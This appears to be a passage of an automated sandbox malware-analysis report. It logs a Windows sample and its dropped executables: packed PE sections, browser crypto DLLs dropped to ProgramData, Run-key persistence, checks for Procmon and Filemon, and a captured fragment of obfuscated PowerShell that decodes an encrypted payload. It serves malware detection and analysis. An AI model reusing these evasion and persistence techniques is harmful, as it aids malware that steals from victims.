Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Google Drive.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1815040 > 1048576

Source: file.exe

Static PE information: Raw size of xxdbzcjj is bigger than: 0x100000 < 0x1a1600

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2445298373.000000006C69D000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 0ac2a0f3ae.exe, 00000024.00000002.3119535099.0000000000A12000.00000040.00000001.01000000.00000019.sdmp, 0ac2a0f3ae.exe, 00000024.00000003.2983049780.0000000004F00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2445298373.000000006C69D000.00000002.00000001.01000000.0000000A.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.390000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xxdbzcjj:EW;txsnlhpz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xxdbzcjj:EW;txsnlhpz:EW;.taggant:EW;
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Unpacked PE file: 20.2.DocumentsECAFHIIJJE.exe.720000.0.unpack :EW;.rsrc:W;.idata :W;lwvftjpd:EW;ppdaehht:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;lwvftjpd:EW;ppdaehht:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 21.2.skotes.exe.fe0000.0.unpack :EW;.rsrc:W;.idata :W;lwvftjpd:EW;ppdaehht:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;lwvftjpd:EW;ppdaehht:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 23.2.skotes.exe.fe0000.0.unpack :EW;.rsrc:W;.idata :W;lwvftjpd:EW;ppdaehht:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;lwvftjpd:EW;ppdaehht:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Unpacked PE file: 24.2.file1.exe.7f0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ytlmplcn:EW;gdxiagsi:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ytlmplcn:EW;gdxiagsi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Unpacked PE file: 30.2.4136f86ac7.exe.c10000.1.unpack :EW;.rsrc:W;.idata :W;cwahjnig:EW;dpfgpfkz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;cwahjnig:EW;dpfgpfkz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Unpacked PE file: 31.2.3160604f40.exe.50000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xxdbzcjj:EW;txsnlhpz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xxdbzcjj:EW;txsnlhpz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Unpacked PE file: 36.2.0ac2a0f3ae.exe.a10000.0.unpack :EW;.rsrc:W;.idata :W;yficgynw:EW;ryhifnco:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Unpacked PE file: 37.2.4136f86ac7.exe.c10000.0.unpack :EW;.rsrc:W;.idata :W;cwahjnig:EW;dpfgpfkz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;cwahjnig:EW;dpfgpfkz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Unpacked PE file: 38.2.3160604f40.exe.50000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xxdbzcjj:EW;txsnlhpz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xxdbzcjj:EW;txsnlhpz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Unpacked PE file: 39.2.0ac2a0f3ae.exe.a10000.0.unpack :EW;.rsrc:W;.idata :W;yficgynw:EW;ryhifnco:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Unpacked PE file: 40.2.4136f86ac7.exe.c10000.0.unpack :EW;.rsrc:W;.idata :W;cwahjnig:EW;dpfgpfkz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;cwahjnig:EW;dpfgpfkz:EW;.taggant:EW;

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String($Key)$ivBytes = [Conv'$decoded += $U1wK7PYc1Ca2$Kvt8oekCIi2L = 'ert]::FromBase64String($IV)$encryptedBy'$decoded += $Kvt8oekCIi2L$GNHT65Ml89Vm = 'tes = [Convert]::FromBase64String($En

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C68C410 LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_6C68C410

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: 0ac2a0f3ae.exe.23.dr	Static PE information: real checksum: 0x2acccc should be: 0x2a9f1d
Source: DocumentsECAFHIIJJE.exe.0.dr	Static PE information: real checksum: 0x324fbd should be: 0x32a75a
Source: file1[1].exe.23.dr	Static PE information: real checksum: 0x1da948 should be: 0x1d3849
Source: 4136f86ac7.exe.23.dr	Static PE information: real checksum: 0x311d1a should be: 0x3136e2
Source: random[1].exe.23.dr	Static PE information: real checksum: 0x2acccc should be: 0x2a9f1d
Source: file1.exe.23.dr	Static PE information: real checksum: 0x1da948 should be: 0x1d3849
Source: 3160604f40.exe.23.dr	Static PE information: real checksum: 0x1c5866 should be: 0x1c07c7
Source: file.exe	Static PE information: real checksum: 0x1c5866 should be: 0x1c07c7
Source: random[1].exe.0.dr	Static PE information: real checksum: 0x311d1a should be: 0x3136e2
Source: skotes.exe.20.dr	Static PE information: real checksum: 0x324fbd should be: 0x32a75a
Source: random[1].exe0.23.dr	Static PE information: real checksum: 0x1c5866 should be: 0x1c07c7

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: xxdbzcjj
Source: file.exe	Static PE information: section name: txsnlhpz
Source: file.exe	Static PE information: section name: .taggant
Source: DocumentsECAFHIIJJE.exe.0.dr	Static PE information: section name:
Source: DocumentsECAFHIIJJE.exe.0.dr	Static PE information: section name: .idata
Source: DocumentsECAFHIIJJE.exe.0.dr	Static PE information: section name: lwvftjpd
Source: DocumentsECAFHIIJJE.exe.0.dr	Static PE information: section name: ppdaehht
Source: DocumentsECAFHIIJJE.exe.0.dr	Static PE information: section name: .taggant
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name: cwahjnig
Source: random[1].exe.0.dr	Static PE information: section name: dpfgpfkz
Source: random[1].exe.0.dr	Static PE information: section name: .taggant
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: skotes.exe.20.dr	Static PE information: section name:
Source: skotes.exe.20.dr	Static PE information: section name: .idata
Source: skotes.exe.20.dr	Static PE information: section name: lwvftjpd
Source: skotes.exe.20.dr	Static PE information: section name: ppdaehht
Source: skotes.exe.20.dr	Static PE information: section name: .taggant
Source: random[1].exe.23.dr	Static PE information: section name:
Source: random[1].exe.23.dr	Static PE information: section name: .idata
Source: random[1].exe.23.dr	Static PE information: section name: yficgynw
Source: random[1].exe.23.dr	Static PE information: section name: ryhifnco
Source: random[1].exe.23.dr	Static PE information: section name: .taggant
Source: 0ac2a0f3ae.exe.23.dr	Static PE information: section name:
Source: 0ac2a0f3ae.exe.23.dr	Static PE information: section name: .idata
Source: 0ac2a0f3ae.exe.23.dr	Static PE information: section name: yficgynw
Source: 0ac2a0f3ae.exe.23.dr	Static PE information: section name: ryhifnco
Source: 0ac2a0f3ae.exe.23.dr	Static PE information: section name: .taggant
Source: file1[1].exe.23.dr	Static PE information: section name:
Source: file1[1].exe.23.dr	Static PE information: section name: .rsrc
Source: file1[1].exe.23.dr	Static PE information: section name: .idata
Source: file1[1].exe.23.dr	Static PE information: section name:
Source: file1[1].exe.23.dr	Static PE information: section name: ytlmplcn
Source: file1[1].exe.23.dr	Static PE information: section name: gdxiagsi
Source: file1[1].exe.23.dr	Static PE information: section name: .taggant
Source: file1.exe.23.dr	Static PE information: section name:
Source: file1.exe.23.dr	Static PE information: section name: .rsrc
Source: file1.exe.23.dr	Static PE information: section name: .idata
Source: file1.exe.23.dr	Static PE information: section name:
Source: file1.exe.23.dr	Static PE information: section name: ytlmplcn
Source: file1.exe.23.dr	Static PE information: section name: gdxiagsi
Source: file1.exe.23.dr	Static PE information: section name: .taggant
Source: 4136f86ac7.exe.23.dr	Static PE information: section name:
Source: 4136f86ac7.exe.23.dr	Static PE information: section name: .idata
Source: 4136f86ac7.exe.23.dr	Static PE information: section name: cwahjnig
Source: 4136f86ac7.exe.23.dr	Static PE information: section name: dpfgpfkz
Source: 4136f86ac7.exe.23.dr	Static PE information: section name: .taggant
Source: random[1].exe0.23.dr	Static PE information: section name:
Source: random[1].exe0.23.dr	Static PE information: section name: .rsrc
Source: random[1].exe0.23.dr	Static PE information: section name: .idata
Source: random[1].exe0.23.dr	Static PE information: section name:
Source: random[1].exe0.23.dr	Static PE information: section name: xxdbzcjj
Source: random[1].exe0.23.dr	Static PE information: section name: txsnlhpz
Source: random[1].exe0.23.dr	Static PE information: section name: .taggant
Source: 3160604f40.exe.23.dr	Static PE information: section name:
Source: 3160604f40.exe.23.dr	Static PE information: section name: .rsrc
Source: 3160604f40.exe.23.dr	Static PE information: section name: .idata
Source: 3160604f40.exe.23.dr	Static PE information: section name:
Source: 3160604f40.exe.23.dr	Static PE information: section name: xxdbzcjj
Source: 3160604f40.exe.23.dr	Static PE information: section name: txsnlhpz
Source: 3160604f40.exe.23.dr	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65B536 push ecx; ret	0_2_6C65B549
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Code function: 20_2_0073D91C push ecx; ret	20_2_0073D92F
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Code function: 20_2_00731359 push es; ret	20_2_0073135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00FFD91C push ecx; ret	21_2_00FFD92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00FEBA83 push ss; retf	21_2_00FEBA85
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00FFD91C push ecx; ret	23_2_00FFD92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00FFDFC6 push ecx; ret	23_2_00FFDFD9

Source: file.exe	Static PE information: section name: xxdbzcjj entropy: 7.9542877120760425
Source: DocumentsECAFHIIJJE.exe.0.dr	Static PE information: section name: entropy: 7.052460894096881
Source: random[1].exe.0.dr	Static PE information: section name: entropy: 7.049831354626162
Source: skotes.exe.20.dr	Static PE information: section name: entropy: 7.052460894096881
Source: random[1].exe.23.dr	Static PE information: section name: entropy: 7.799529425951728
Source: 0ac2a0f3ae.exe.23.dr	Static PE information: section name: entropy: 7.799529425951728
Source: file1[1].exe.23.dr	Static PE information: section name: entropy: 7.967430741794287
Source: file1[1].exe.23.dr	Static PE information: section name: ytlmplcn entropy: 7.953162268272761
Source: file1.exe.23.dr	Static PE information: section name: entropy: 7.967430741794287
Source: file1.exe.23.dr	Static PE information: section name: ytlmplcn entropy: 7.953162268272761
Source: 4136f86ac7.exe.23.dr	Static PE information: section name: entropy: 7.049831354626162
Source: random[1].exe0.23.dr	Static PE information: section name: xxdbzcjj entropy: 7.9542877120760425
Source: 3160604f40.exe.23.dr	Static PE information: section name: xxdbzcjj entropy: 7.9542877120760425

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsECAFHIIJJE.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Jump to dropped file
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\DocumentsECAFHIIJJE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\file1[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsECAFHIIJJE.exe

Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3160604f40.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0ac2a0f3ae.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4136f86ac7.exe

Drops PE files to the user root directory

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsECAFHIIJJE.exe

Jump to dropped file

Monitors registry run keys for changes

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Window searched: window name: RegmonClass
